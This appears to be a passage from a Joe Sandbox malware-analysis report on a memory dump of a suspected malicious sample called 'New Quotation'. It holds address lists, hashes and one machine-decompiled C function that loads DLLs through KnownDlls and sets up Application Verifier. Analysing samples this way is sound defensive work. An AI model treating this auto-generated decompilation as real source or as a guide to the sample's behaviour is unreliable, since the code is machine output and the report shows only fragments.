                                                                                                                                                                                          0x1d7e0930
                                                                                                                                                                                          0x1d7e0936
                                                                                                                                                                                          0x1d7e0938
                                                                                                                                                                                          0x1d7e093e
                                                                                                                                                                                          0x1d7e093e
                                                                                                                                                                                          0x1d7e0938
                                                                                                                                                                                          0x1d7e06ff
                                                                                                                                                                                          0x1d834f1b
                                                                                                                                                                                          0x1d834f1d
                                                                                                                                                                                          0x1d834f22
                                                                                                                                                                                          0x1d834f29
                                                                                                                                                                                          0x1d834f2a
                                                                                                                                                                                          0x1d834f2c
                                                                                                                                                                                          0x1d834f2d
                                                                                                                                                                                          0x1d834f2f
                                                                                                                                                                                          0x1d834f34
                                                                                                                                                                                          0x1d834f36
                                                                                                                                                                                          0x1d834f39
                                                                                                                                                                                          0x1d834f44
                                                                                                                                                                                          0x1d834f4d
                                                                                                                                                                                          0x1d834f4f
                                                                                                                                                                                          0x1d834f54
                                                                                                                                                                                          0x1d834f5b
                                                                                                                                                                                          0x1d834f5b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834f5b
                                                                                                                                                                                          0x1d834f3b
                                                                                                                                                                                          0x1d834f3d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834f3f
                                                                                                                                                                                          0x1d834f42
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e0705
                                                                                                                                                                                          0x1d7e0705
                                                                                                                                                                                          0x1d7e070c
                                                                                                                                                                                          0x1d7e070e
                                                                                                                                                                                          0x1d7e0724
                                                                                                                                                                                          0x1d7e0727
                                                                                                                                                                                          0x1d7e072d
                                                                                                                                                                                          0x1d7e0730
                                                                                                                                                                                          0x1d7e0751
                                                                                                                                                                                          0x1d7e0751
                                                                                                                                                                                          0x1d7e0757
                                                                                                                                                                                          0x1d7e075c
                                                                                                                                                                                          0x1d7e075d
                                                                                                                                                                                          0x1d7e075f
                                                                                                                                                                                          0x1d7e0760
                                                                                                                                                                                          0x1d7e0762
                                                                                                                                                                                          0x1d7e0767
                                                                                                                                                                                          0x1d7e076a
                                                                                                                                                                                          0x1d7e076a
                                                                                                                                                                                          0x1d7e0770
                                                                                                                                                                                          0x1d7e0772
                                                                                                                                                                                          0x1d834f9f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834f9f
                                                                                                                                                                                          0x1d7e077e
                                                                                                                                                                                          0x1d7e0783
                                                                                                                                                                                          0x1d834faa
                                                                                                                                                                                          0x1d834fad
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834fbc
                                                                                                                                                                                          0x1d7e078e
                                                                                                                                                                                          0x1d7e0791
                                                                                                                                                                                          0x1d834fcc
                                                                                                                                                                                          0x1d834fd3
                                                                                                                                                                                          0x1d834fe2
                                                                                                                                                                                          0x1d834fe2
                                                                                                                                                                                          0x1d834fd3
                                                                                                                                                                                          0x1d7e079b
                                                                                                                                                                                          0x1d7e07a0
                                                                                                                                                                                          0x1d7e07a4
                                                                                                                                                                                          0x1d7e07b0
                                                                                                                                                                                          0x1d7e07b7
                                                                                                                                                                                          0x1d834fec
                                                                                                                                                                                          0x1d834ff1
                                                                                                                                                                                          0x1d834ff1
                                                                                                                                                                                          0x1d7e07b7
                                                                                                                                                                                          0x1d7e07bd
                                                                                                                                                                                          0x1d7e07c1
                                                                                                                                                                                          0x1d7e07c5
                                                                                                                                                                                          0x1d7e07c8
                                                                                                                                                                                          0x1d7e07cb
                                                                                                                                                                                          0x1d7e07d0
                                                                                                                                                                                          0x1d7e07d3
                                                                                                                                                                                          0x1d7e07d3
                                                                                                                                                                                          0x1d7e07d6
                                                                                                                                                                                          0x1d835008
                                                                                                                                                                                          0x1d7e07e4
                                                                                                                                                                                          0x1d7e07e4
                                                                                                                                                                                          0x1d7e07e6
                                                                                                                                                                                          0x1d7e07e6
                                                                                                                                                                                          0x1d7e07e9
                                                                                                                                                                                          0x1d7e07ee
                                                                                                                                                                                          0x1d7e081b
                                                                                                                                                                                          0x1d7e081b
                                                                                                                                                                                          0x1d7e081e
                                                                                                                                                                                          0x1d7e0827
                                                                                                                                                                                          0x1d7e082d
                                                                                                                                                                                          0x1d7e0833
                                                                                                                                                                                          0x1d7e0839
                                                                                                                                                                                          0x1d7e083f
                                                                                                                                                                                          0x1d7e0848
                                                                                                                                                                                          0x1d7e08fd
                                                                                                                                                                                          0x1d7e0903
                                                                                                                                                                                          0x1d7e0903
                                                                                                                                                                                          0x1d7e084e
                                                                                                                                                                                          0x1d7e0851
                                                                                                                                                                                          0x1d7e0855
                                                                                                                                                                                          0x1d7e0945
                                                                                                                                                                                          0x1d7e094d
                                                                                                                                                                                          0x1d7e0950
                                                                                                                                                                                          0x1d7e0953
                                                                                                                                                                                          0x1d7e0964
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e0964
                                                                                                                                                                                          0x1d7e0955
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e085b
                                                                                                                                                                                          0x1d7e085b
                                                                                                                                                                                          0x1d7e086e
                                                                                                                                                                                          0x1d7e0876
                                                                                                                                                                                          0x1d7e0879
                                                                                                                                                                                          0x1d7e0879
                                                                                                                                                                                          0x1d7e087c
                                                                                                                                                                                          0x1d7e0880
                                                                                                                                                                                          0x1d7e0885
                                                                                                                                                                                          0x1d7e08dd
                                                                                                                                                                                          0x1d7e08de
                                                                                                                                                                                          0x1d7e08e1
                                                                                                                                                                                          0x1d7e08e6
                                                                                                                                                                                          0x1d7e08f3
                                                                                                                                                                                          0x1d7e08f8
                                                                                                                                                                                          0x1d7e08f8
                                                                                                                                                                                          0x1d7e0887
                                                                                                                                                                                          0x1d7e0887
                                                                                                                                                                                          0x1d7e0887
                                                                                                                                                                                          0x1d7e0889
                                                                                                                                                                                          0x1d7e0892
                                                                                                                                                                                          0x1d7e0897
                                                                                                                                                                                          0x1d83505d
                                                                                                                                                                                          0x1d835060
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83506f
                                                                                                                                                                                          0x1d7e08a2
                                                                                                                                                                                          0x1d7e08a5
                                                                                                                                                                                          0x1d835079
                                                                                                                                                                                          0x1d83507f
                                                                                                                                                                                          0x1d835086
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835091
                                                                                                                                                                                          0x1d835093
                                                                                                                                                                                          0x1d8350a5
                                                                                                                                                                                          0x1d835095
                                                                                                                                                                                          0x1d83509e
                                                                                                                                                                                          0x1d83509e
                                                                                                                                                                                          0x1d8350af
                                                                                                                                                                                          0x1d8350be
                                                                                                                                                                                          0x1d7e08ae
                                                                                                                                                                                          0x1d7e08b4
                                                                                                                                                                                          0x1d7e08b9
                                                                                                                                                                                          0x1d8350c8
                                                                                                                                                                                          0x1d8350cb
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8350da
                                                                                                                                                                                          0x1d7e08c4
                                                                                                                                                                                          0x1d7e08c7
                                                                                                                                                                                          0x1d8350e9
                                                                                                                                                                                          0x1d8350eb
                                                                                                                                                                                          0x1d8350fd
                                                                                                                                                                                          0x1d8350ed
                                                                                                                                                                                          0x1d8350f6
                                                                                                                                                                                          0x1d8350f6
                                                                                                                                                                                          0x1d835113
                                                                                                                                                                                          0x1d835113
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e08cd
                                                                                                                                                                                          0x1d7e08bf
                                                                                                                                                                                          0x1d7e08bf
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e08bf
                                                                                                                                                                                          0x1d7e08ab
                                                                                                                                                                                          0x1d7e08ab
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e08ab
                                                                                                                                                                                          0x1d7e089d
                                                                                                                                                                                          0x1d7e089d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e089d
                                                                                                                                                                                          0x1d7e07f0
                                                                                                                                                                                          0x1d7e07f0
                                                                                                                                                                                          0x1d7e07f8
                                                                                                                                                                                          0x1d835014
                                                                                                                                                                                          0x1d835017
                                                                                                                                                                                          0x1d83501a
                                                                                                                                                                                          0x1d835036
                                                                                                                                                                                          0x1d83503d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d83501c
                                                                                                                                                                                          0x1d83501c
                                                                                                                                                                                          0x1d83501c
                                                                                                                                                                                          0x1d83501e
                                                                                                                                                                                          0x1d835020
                                                                                                                                                                                          0x1d835023
                                                                                                                                                                                          0x1d835026
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835028
                                                                                                                                                                                          0x1d83502b
                                                                                                                                                                                          0x1d83502e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835030
                                                                                                                                                                                          0x1d835035
                                                                                                                                                                                          0x1d835035
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d835035
                                                                                                                                                                                          0x1d7e07fe
                                                                                                                                                                                          0x1d7e07fe
                                                                                                                                                                                          0x1d7e0801
                                                                                                                                                                                          0x1d7e0803
                                                                                                                                                                                          0x1d7e0808
                                                                                                                                                                                          0x1d835053
                                                                                                                                                                                          0x1d7e0816
                                                                                                                                                                                          0x1d7e0816
                                                                                                                                                                                          0x1d7e0818
                                                                                                                                                                                          0x1d7e0818
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e0808
                                                                                                                                                                                          0x1d7e07ee
                                                                                                                                                                                          0x1d7e0789
                                                                                                                                                                                          0x1d7e0789
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e0789
                                                                                                                                                                                          0x1d7e0732
                                                                                                                                                                                          0x1d7e0736
                                                                                                                                                                                          0x1d834f63
                                                                                                                                                                                          0x1d834f66
                                                                                                                                                                                          0x1d834f66
                                                                                                                                                                                          0x1d834f6b
                                                                                                                                                                                          0x1d834f6d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834f76
                                                                                                                                                                                          0x1d834f79
                                                                                                                                                                                          0x1d834f7b
                                                                                                                                                                                          0x1d834f8d
                                                                                                                                                                                          0x1d834f92
                                                                                                                                                                                          0x1d834f92
                                                                                                                                                                                          0x1d834f95
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d834f95
                                                                                                                                                                                          0x1d7e073c
                                                                                                                                                                                          0x1d7e0742
                                                                                                                                                                                          0x1d7e074b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d7e074b
                                                                                                                                                                                          0x1d7e06ff

                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                          • API String ID: 0-4253913091
                                                                                                                                                                                          • Opcode ID: e90800ea2e9e36bf3f883aa1cbe91ccde98aad9e9341d1431512391ca52ad51a
                                                                                                                                                                                          • Instruction ID: 48195aa13d24bff9f764bc199e7eea7cb9f79928e2f0a4add7c11883ea3e935f
                                                                                                                                                                                          • Opcode Fuzzy Hash: e90800ea2e9e36bf3f883aa1cbe91ccde98aad9e9341d1431512391ca52ad51a
                                                                                                                                                                                          • Instruction Fuzzy Hash: D6F1FD74A00656EFDB06CF68C894B6AB7B5FF84750F1081A9E5099B391D730F981CFA2
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D8598B2 Relevance: 6.8, Strings: 5, Instructions: 542COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E1D8598B2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				char _v528;
				short _v530;
				short _v532;
				short _v534;
				char _v536;
				char _v576;
				char* _v580;
				intOrPtr _v582;
				char _v584;
				void* _v588;
				signed short* _v592;
				char _v596;
				intOrPtr _v600;
				char _v604;
				void* _v608;
				char _v612;
				char _v616;
				void* _v620;
				void* _v624;
				intOrPtr _v628;
				char* _v632;
				void* _v636;
				char _v640;
				void* _v644;
				intOrPtr _v648;
				char _v652;
				void* _v656;
				void* _v660;
				void* _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				char _v676;
				intOrPtr _v688;
				intOrPtr _v692;
				intOrPtr _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				intOrPtr _v708;
				intOrPtr _v712;
				intOrPtr _v716;
				void* _v720;
				void* _v724;
				void* _v728;
				intOrPtr _v732;
				intOrPtr _v736;
				intOrPtr _v740;
				intOrPtr _v744;
				intOrPtr _v748;
				intOrPtr _v752;
				intOrPtr _v756;
				char _v760;
				char _v764;
				char _v768;
				char _v776;
				char _v784;
				char _v792;
				char _v800;
				intOrPtr _v832;
				char _v848;
				void* _v852;
				intOrPtr _v880;
				char _v912;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t258;
				void* _t272;
				short _t273;
				void* _t276;
				void* _t278;
				void* _t283;
				void* _t285;
				void* _t290;
				void* _t309;
				void* _t315;
				void* _t318;
				intOrPtr* _t322;
				void* _t325;
				void* _t326;
				void* _t342;
				void* _t344;
				void* _t346;
				intOrPtr _t347;
				intOrPtr _t348;
				void* _t360;
				void* _t367;
				short _t382;
				void* _t384;
				signed short* _t385;
				intOrPtr* _t386;
				signed int _t388;
				signed int _t390;
				void* _t399;
				signed int _t405;
				signed short* _t407;
				signed int _t410;
				intOrPtr* _t411;
				intOrPtr _t416;
				void* _t417;
				intOrPtr _t418;
				intOrPtr _t419;
				void* _t420;
				void** _t422;
				intOrPtr _t427;
				signed int _t430;
				void* _t431;
				void* _t432;

				_t406 = __edx;
				_v12 =  *0x1d8cb370 ^ _t430;
				_t427 = _a12;
				_v668 = _a4;
				_t417 = 0;
				_v648 = _a8;
				_v664 = __edx;
				_v600 = _t427;
				_v608 = 0;
				_v612 = 0;
				_v596 = 0;
				_v604 = 0;
				_v588 = 0;
				_v652 = 0;
				_v616 = 0;
				E1D815050(__ecx,  &_v776, L"\\KnownDlls32");
				_v640 = 0x18;
				_v632 =  &_v776;
				_push( &_v640);
				_push(3);
				_v636 = 0;
				_push( &_v608);
				_v628 = 0x40;
				_v624 = 0;
				_v620 = 0;
				_t258 = E1D812F30();
				_t378 = _t258;
				if(_t258 >= 0) {
					E1D815050(__ecx,  &_v784, L"KnownDllPath");
					_v636 = _v608;
					_v632 =  &_v784;
					_push( &_v640);
					_push(1);
					_v640 = 0x18;
					_push( &_v612);
					_v628 = 0x40;
					_v624 = 0;
					_v620 = 0;
					_t272 = E1D813C80();
					_t378 = _t272;
					if(_t272 >= 0) {
						_t382 = 0x5c;
						_t273 = 0x3f;
						_v534 = _t273;
						_v532 = _t273;
						_v580 =  &_v528;
						_push(0);
						_push( &_v584);
						_push(_v612);
						_v536 = _t382;
						_v530 = _t382;
						_v584 = 0x2000000;
						_t276 = E1D813F90();
						_t378 = _t276;
						if(_t276 >= 0) {
							_v580 =  &_v536;
							_t278 = 8;
							_v584 = _v584 + _t278;
							_v582 = _v582 + _t278;
							E1D815050(_t382,  &_v792, "\\");
							_t283 = E1D7F10D0(_t382,  &_v584,  &_v792);
							_t378 = _t283;
							if(_t283 >= 0) {
								_t285 = E1D7F10D0(_t382,  &_v584, 0x1d7a1b98);
								_t378 = _t285;
								if(_t285 >= 0) {
									if(( *( *[fs:0x30] + 0x68) & 0x00040000) != 0) {
										_push(0);
										_push(0);
										_v676 = _v584;
										_push(0);
										_v672 = _v580;
										_push(8);
										_push( &_v676);
										_push(0x26);
										E1D814580();
									}
									_v640 = 0x18;
									_v632 =  &_v584;
									_push( &_v576);
									_v636 = _t417;
									_push( &_v640);
									_v628 = 0x40;
									_v624 = _t417;
									_v620 = _t417;
									_t290 = E1D812D80();
									if(_t290 >= 0 || _t290 == 0xc0000043 || _t290 == 0xc0000022) {
										_push(0x60);
										_push(5);
										_push( &_v800);
										_push( &_v640);
										_push(0x100020);
										_push( &_v604);
										_t378 = E1D812CE0();
										__eflags = _t378;
										if(_t378 >= 0) {
											_push(_v604);
											_push(0x1000000);
											_push(0x10);
											_push(_t417);
											_push(_t417);
											_push(0xd);
											_push( &_v596);
											_t378 = E1D812E50();
											__eflags = _t378;
											if(_t378 >= 0) {
												_t383 = _t427 + 0xd4;
												 *(_t427 + 0xd4) = 0;
												 *((short*)(_t427 + 0xd6)) = 0x208;
												 *((intOrPtr*)(_t427 + 0xd8)) = _t427 + 0xdc;
												_v580 =  &_v528;
												_v584 = _v584 + 0xfff8;
												_v582 = _v582 + 0xfff8;
												E1D7F5F20(_t427 + 0xd4,  &_v584);
												_t418 =  *[fs:0x18];
												_push(2);
												_push(0x800000);
												_push(1);
												 *((intOrPtr*)(_t418 + 0x14)) = _v580;
												_push( &_v652);
												_push(0);
												_push(0);
												_push(0);
												_push( &_v588);
												_push(0xffffffff);
												_push(_v596);
												_t378 = E1D812C30();
												__eflags = _t378;
												if(_t378 < 0) {
													_t427 = _v600;
													goto L64;
												} else {
													_t309 = E1D7DB920(_t383, _v588);
													_t427 = _v600;
													_t384 = _t309;
													_v644 = _t384;
													__eflags = _t384;
													if(_t384 != 0) {
														_t407 = _t427 + 0x24;
														 *(_t427 + 0x18) = _v588;
														 *((intOrPtr*)(_t427 + 0x20)) =  *((intOrPtr*)(_t384 + 0x50));
														_t385 = _t427 + 0xd4;
														 *(_t427 + 0x4c) =  *(_t427 + 0x4c) & 0x00000000;
														 *((intOrPtr*)(_t427 + 0x44)) =  *((intOrPtr*)(_t384 + 8));
														 *_t407 =  *_t385;
														 *(_t427 + 0x34) =  *(_t427 + 0x34) & 0x00000000;
														_t407[2] = _t385[2];
														_t419 =  *((intOrPtr*)(_t427 + 0x28));
														_v592 = _t407;
														_t410 = (( *_t407 & 0x0000ffff) >> 1) - 1;
														__eflags = _t410;
														_t315 = 0x5c;
														_t411 = _t419 + _t410 * 2;
														while(1) {
															__eflags = _t411 - _t419;
															if(_t411 <= _t419) {
																break;
															}
															__eflags = _t315 -  *_t411;
															if(_t315 ==  *_t411) {
																L23:
																_t416 = _t411 + 2;
																 *((intOrPtr*)(_t427 + 0x30)) = _t416;
																_t405 = _t416 - _t419 & 0xfffffffe;
																 *(_t427 + 0x2c) = ( *_v592 & 0x0000ffff) - _t405;
																 *((short*)(_t427 + 0x2e)) =  *((intOrPtr*)(_t427 + 0x26)) - _t405;
															} else {
																_t411 = _t411 - 2;
																continue;
															}
															L25:
															_t420 = _v644;
															_t318 =  *(_t420 + 0x28);
															__eflags = _t318;
															if(_t318 != 0) {
																_t318 = _t318 + _v588;
																__eflags = _t318;
															}
															 *(_t427 + 0x1c) = _t318;
															 *(_t427 + 0x80) =  *(_t420 + 0x34);
															 *((intOrPtr*)(_t427 + 0x50)) = _t427 + 0xa8;
															E1D818F40(_t427 + 0xa8, 0, 0x2c);
															_t432 = _t431 + 0xc;
															_t386 = _t427 + 0xa8;
															_t322 = _t427 + 0x54;
															 *_t322 = _t386;
															 *((intOrPtr*)(_t322 + 4)) = _t386;
															 *_t386 = _t322;
															_t406 = 2;
															 *((intOrPtr*)(_t386 + 4)) = _t322;
															 *(_t427 + 0x9c) = _t406;
															 *(_t386 + 0xc) =  *(_t386 + 0xc) | 0xffffffff;
															_push(0);
															_push("true");
															 *((short*)( *_t386 - 0x1c)) = 0xffff;
															_push( &_v656);
															_push(_t406);
															_push(_v596);
															_t325 = E1D812EC0();
															__eflags = _t325;
															if(_t325 >= 0) {
																_t326 = _v656;
																__eflags = _t326;
																if(_t326 != 0) {
																	_t144 = _t427 + 0x80;
																	 *_t144 =  *(_t427 + 0x80) - _t326;
																	__eflags =  *_t144;
																}
																__eflags =  *(_t420 + 0x16) & 0x00002000;
																if(( *(_t420 + 0x16) & 0x00002000) != 0) {
																	_t149 = _t427 + 0x34;
																	 *_t149 =  *(_t427 + 0x34) | 0x00000004;
																	__eflags =  *_t149;
																}
																_t417 = 0;
																__eflags =  *(_t427 + 0x34) & 0x00000004;
																if(__eflags == 0) {
																	 *(_t427 + 0x1c) = 0;
																}
																__eflags = E1D7DDE20(0xffff, __eflags,  *(_t427 + 0x18), 1, 9,  &_v660);
																if(__eflags == 0) {
																	L39:
																	_t406 = E1D7DDE20(0xffff, __eflags,  *(_t427 + 0x18), 1, 1,  &_v764);
																	__eflags = _t406;
																	if(_t406 == 0) {
																		goto L38;
																	} else {
																		_t422 =  *(_t427 + 0x18) +  *_t406;
																		_v592 =  *((intOrPtr*)(_t406 + 0x10)) +  *(_t427 + 0x18);
																		__eflags =  *_t422;
																		if( *_t422 == 0) {
																			L50:
																			_t388 =  *(_t427 + 0x34);
																			_t417 = 0;
																			__eflags = (_t388 & 0x00002004) - 4;
																			if((_t388 & 0x00002004) != 4) {
																				L53:
																				__eflags = _t388 & 0x00000200;
																				if(__eflags == 0) {
																					E1D7D9D4A(_v588,  *((intOrPtr*)(_t427 + 0x20)), __eflags);
																					_t194 = _t427 + 0x34;
																					 *_t194 =  *(_t427 + 0x34) | 0x00000200;
																					__eflags =  *_t194;
																				}
																				_t406 =  *(_t427 + 0x18);
																				_v744 = _v664;
																				_v716 = _v668;
																				_v712 = _v648;
																				_v616 =  &_v760;
																				_push( &_v616);
																				_push(5);
																				_v760 = 0x4c;
																				_v756 = 0x1d889300;
																				_v708 = E1D7CFCF0;
																				_v752 = E1D8589A0;
																				_v748 = 0x1d888fe0;
																				_v704 = 0x1d889000;
																				_v700 = E1D889050;
																				_v696 = E1D889020;
																				_v692 = E1D8891F0;
																				_v688 = E1D889240;
																				_v740 = E1D856900;
																				_v736 = E1D857650;
																				_v732 = E1D809730;
																				_v728 = _t417;
																				_v724 = _t417;
																				_v720 = _t417;
																				_t342 = E1D7EDCD1(_t378,  *(_t427 + 0x1c),  *(_t427 + 0x18), _t417, _t427, __eflags);
																				__eflags = _t342;
																				if(_t342 != 0) {
																					__eflags = _v616 -  &_v760;
																					if(_v616 !=  &_v760) {
																						goto L56;
																					} else {
																						_t406 = _v720;
																						__eflags = _t406;
																						if(_t406 == 0) {
																							goto L56;
																						} else {
																							__eflags =  *_t406 - 0x2c;
																							if( *_t406 != 0x2c) {
																								goto L56;
																							} else {
																								_t344 = _v724;
																								__eflags = _t344;
																								if(_t344 == 0) {
																									goto L56;
																								} else {
																									__eflags =  *_t344 - 0x58;
																									if( *_t344 != 0x58) {
																										goto L56;
																									} else {
																										_t390 = 0x16;
																										_t346 = memcpy(0x1d8c3744, _t344, _t390 << 2);
																										_t427 = _v600;
																										 *0x1d8c3738 = _t346;
																										_t347 =  *0x1d8c5a74; // 0x0
																										 *((intOrPtr*)(_t406 + 0x14)) = _t347;
																										_t348 =  *0x1d8c69dc; // 0x0
																										 *((intOrPtr*)(_t406 + 0x18)) = _t348;
																										E1D7F07F5(_t427);
																										_t406 = _t427 + 0x24;
																										_t417 = 0;
																										_v588 = 0;
																										E1D7EDF36( *(_t427 + 0x18), _t427 + 0x24, 0x14ae);
																										 *((intOrPtr*)(_t427 + 0xc8)) = 9;
																									}
																								}
																							}
																						}
																					}
																				} else {
																					L56:
																					_t378 = 0xc0000142;
																				}
																			} else {
																				_v592 = 0;
																				E1D7D9F1A( *(_t427 + 0x18),  *((intOrPtr*)(_t427 + 0x20)), _t427, 0, E1D7F088D() ^  *0x1d8c92e0,  &_v592);
																				_t406 = _v644;
																				_t378 = E1D7EFED0(_t427, _v644, _v592);
																				__eflags = _t378;
																				if(_t378 >= 0) {
																					_t187 = _t427 + 0x34;
																					 *_t187 =  *(_t427 + 0x34) | 0x00002000;
																					__eflags =  *_t187;
																					_t388 =  *(_t427 + 0x34);
																					goto L53;
																				}
																			}
																		} else {
																			E1D818F40( &_v912, 0, 0x6c);
																			_t432 = _t432 + 0xc;
																			_v880 = _t427;
																			_t378 = E1D7D9C41( &_v912, __eflags);
																			__eflags = _t378;
																			if(_t378 < 0) {
																				goto L64;
																			} else {
																				__eflags = _v852;
																				if(_v852 == 0) {
																					goto L17;
																				} else {
																					_t360 =  *_t422;
																					_t399 = _v592 - _t422;
																					__eflags = _t399;
																					_v592 = _t399;
																					while(1) {
																						_t406 =  *(_t427 + 0x18) + _t360 + 2;
																						_t378 = E1D7C62A0(_v648,  *(_t427 + 0x18) + _t360 + 2, __eflags, 0, _t399 + _t422);
																						__eflags = _t378;
																						if(_t378 < 0) {
																							goto L64;
																						}
																						_t422 =  &(_t422[1]);
																						_t360 =  *_t422;
																						__eflags = _t360;
																						if(__eflags == 0) {
																							_push( &_v768);
																							_push(_v832);
																							_push( &_v848);
																							_push( &_v852);
																							_push(0xffffffff);
																							E1D812EB0();
																							_t367 = E1D7F00DD();
																							_t417 = 0;
																							__eflags = _t367;
																							if(_t367 != 0) {
																								_t406 = 0;
																								__eflags = 0;
																								_t378 = E1D8546E2( *((intOrPtr*)(_v880 + 0x18)), 0, 0);
																							}
																							__eflags = _t378;
																							if(_t378 >= 0) {
																								goto L50;
																							}
																						} else {
																							_t399 = _v592;
																							continue;
																						}
																						goto L65;
																					}
																					goto L64;
																				}
																			}
																		}
																	}
																} else {
																	__eflags = _v660;
																	if(__eflags <= 0) {
																		goto L39;
																	} else {
																		_push("AVRF: Verifier .dlls must not have thread locals\n");
																		_push(_t417);
																		_push(0x5d);
																		E1D85EF10();
																		asm("int3");
																		L38:
																		_t378 = 0xc000007b;
																	}
																}
															} else {
																_t378 = _t325;
																goto L64;
															}
															goto L65;
														}
														__eflags = _t315 -  *_t411;
														if(_t315 !=  *_t411) {
															 *(_t427 + 0x2c) =  *(_t427 + 0x24);
															 *((intOrPtr*)(_t427 + 0x30)) = _t419;
														} else {
															goto L23;
														}
														goto L25;
													} else {
														L17:
														_t378 = 0xc000007b;
														L64:
														_t417 = 0;
														__eflags = 0;
													}
												}
											}
										} else {
											__eflags = _t378 - 0xc0000034;
											if(_t378 == 0xc0000034) {
												goto L10;
											}
										}
									} else {
										L10:
										_t378 = 0xc0000135;
									}
								}
							}
						}
					}
				}
				L65:
				if(_v588 != 0) {
					_push(_v588);
					_push(0xffffffff);
					E1D812C50();
					 *(_t427 + 0x18) = _t417;
				}
				if(_v604 != 0) {
					_push(_v604);
					E1D812A80();
				}
				if(_v596 != 0) {
					_push(_v596);
					E1D812A80();
				}
				if(_v608 != 0) {
					_push(_v608);
					E1D812A80();
				}
				if(_v612 != 0) {
					_push(_v612);
					E1D812A80();
				}
				return E1D814B50(_t378, _t378, _v12 ^ _t430, _t406, _t417, _t427);
			}
















































































































                                                                                                                                                                                          0x1d8598b2
                                                                                                                                                                                          0x1d8598c4
                                                                                                                                                                                          0x1d8598cc
                                                                                                                                                                                          0x1d8598d0
                                                                                                                                                                                          0x1d8598d6
                                                                                                                                                                                          0x1d8598db
                                                                                                                                                                                          0x1d8598ed
                                                                                                                                                                                          0x1d8598f3
                                                                                                                                                                                          0x1d8598f9
                                                                                                                                                                                          0x1d8598ff
                                                                                                                                                                                          0x1d859905
                                                                                                                                                                                          0x1d85990b
                                                                                                                                                                                          0x1d859911
                                                                                                                                                                                          0x1d859917
                                                                                                                                                                                          0x1d85991d
                                                                                                                                                                                          0x1d859923
                                                                                                                                                                                          0x1d85992e
                                                                                                                                                                                          0x1d859938
                                                                                                                                                                                          0x1d859944
                                                                                                                                                                                          0x1d859945
                                                                                                                                                                                          0x1d85994d
                                                                                                                                                                                          0x1d859953
                                                                                                                                                                                          0x1d859954
                                                                                                                                                                                          0x1d85995e
                                                                                                                                                                                          0x1d859964
                                                                                                                                                                                          0x1d85996a
                                                                                                                                                                                          0x1d85996f
                                                                                                                                                                                          0x1d859973
                                                                                                                                                                                          0x1d859985
                                                                                                                                                                                          0x1d859990
                                                                                                                                                                                          0x1d85999c
                                                                                                                                                                                          0x1d8599a8
                                                                                                                                                                                          0x1d8599a9
                                                                                                                                                                                          0x1d8599b1
                                                                                                                                                                                          0x1d8599bb
                                                                                                                                                                                          0x1d8599bc
                                                                                                                                                                                          0x1d8599c6
                                                                                                                                                                                          0x1d8599cc
                                                                                                                                                                                          0x1d8599d2
                                                                                                                                                                                          0x1d8599d7
                                                                                                                                                                                          0x1d8599db
                                                                                                                                                                                          0x1d8599e3
                                                                                                                                                                                          0x1d8599e6
                                                                                                                                                                                          0x1d8599e7
                                                                                                                                                                                          0x1d8599ee
                                                                                                                                                                                          0x1d8599fb
                                                                                                                                                                                          0x1d859a07
                                                                                                                                                                                          0x1d859a08
                                                                                                                                                                                          0x1d859a09
                                                                                                                                                                                          0x1d859a0f
                                                                                                                                                                                          0x1d859a16
                                                                                                                                                                                          0x1d859a1d
